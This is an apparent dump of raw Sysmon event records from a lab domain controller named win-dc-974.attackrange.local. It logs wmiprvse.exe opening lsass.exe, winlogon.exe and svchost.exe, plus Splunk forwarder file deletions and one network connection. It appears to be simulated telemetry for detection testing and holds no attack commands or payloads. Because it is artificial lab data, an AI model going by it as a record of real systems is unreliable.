16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246444Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246443Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.087{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246442Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.086{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246441Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.086{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246440Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.085{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246439Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.084{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246438Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.062{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6EB6-603E-14AB-00000000AD01}13308C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246437Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.062{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6EB6-603E-14AB-00000000AD01}13308C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246436Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.062{05ADC7E1-229F-6039-1600-00000000AD01}15402240C:\Windows\system32\svchost.exe{05ADC7E1-6EB6-603E-14AB-00000000AD01}13308C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246435Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.046{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6EB6-603E-14AB-00000000AD01}13308C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002246434Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.030{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EB1559F0B5E4AE5D5F46F40E17AA4F5,SHA256=17B1D44C67EEA56812E06EBF0150C639D6E008965A57C8D8729977A444D97A9C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002246433Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.030{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6EB6-603E-14AB-00000000AD01}13308C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002246432Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.030{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6EB6-603E-14AB-00000000AD01}13308C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246431Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.015{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246430Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.015{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246429Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.015{05ADC7E1-229D-6039-0B00-00000000AD01}85214476C:\Windows\system32\lsass.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002247065Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:31.233{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=49482BF4386D433FEAA13C7E055D5D3D,SHA256=78821F6864591044414D6C173B3CF0EAB6CC9AB91C06BF38518871DE5CB5BD94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247064Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:31.233{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DACCCFC793BA8EADF86DF84864578CE1,SHA256=E366E4DB244F621DF9014C3A4AE3E9561E5951DFFB18C65014099D64A6AAAEF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247063Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:31.233{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A6B6D0DA2D9168DDB94F8403DBD28CE7,SHA256=8BE5E92BEA19CE52E803CC988109D9092434F32F43C61DD790A8746093D5AFEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247067Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:32.768{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=294E59407F0DDFB99CAB2331C6171D92,SHA256=7A99AC37383E088C37813DA201508880C82060E2BE65D9916835239E32A8E1A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247066Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:32.767{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6C4D0697F8B3EB01AD063842366FF976,SHA256=16F69EF21C6BB07767EB4D507CB50471FF0AD048699D8E492527134240579D00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247072Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:33.780{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50D5C1EF61570EAAD0E6ED0070219769,SHA256=DDC2B20374D4FBD703DF96F2FBD79CD55F762B0997CD51752E512243CBC9131E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247071Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:23.172{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60227-false10.0.1.12-8000- 23542300x80000000000000002247070Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:33.530{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AFADF91654924AB88968C2DF68223379,SHA256=82FE25F6E88849C0CB3647125655090335EAA9B7C194B611ED5D0B0F236C2C38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247069Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:33.530{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C3CD823E1DCB098D5AE13927227F365,SHA256=E4ED34573C70DA022F2F1E82A40214CE6241B88AC89BD0E3DCA7E54503744EBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247068Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:33.530{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0AB2F06D24A39FA9FD2C1EA78813BA7C,SHA256=AD84C20AB4B78E79E78F990E198266DA43EF26E8CFD8821C2919B840B9BE5804,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247073Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:34.796{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8419B2CE1791AF746FABA2804D6C8E3,SHA256=32823274C4A244C32907D22C1D75DF1445C4CD9EBE3B5D3C98ADF10FD7E81827,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247074Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:35.812{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B15C02F760A5D7D414524E74A98B669,SHA256=22AD1E77DEF3A53CF81C26FB04FFF2CC5DBBF9796827730EF0C36ECCA0BBB9AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247077Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:36.843{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAE94E5E6B98C2BD964C4EF9CACD57BC,SHA256=A72C3604F1107AA4E385391FE1C9E191AC892C12D4FA25FE34E1D75319A07055,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247076Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:36.624{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AAD08A15032E6FB9BAB19363960BAC5C,SHA256=151D72F9A709A84DB7D8978447A2B807FB066E8611CB6E79E1B2C3109C93CE18,IMPHASH=00000000000000000000000000000000falsetrue 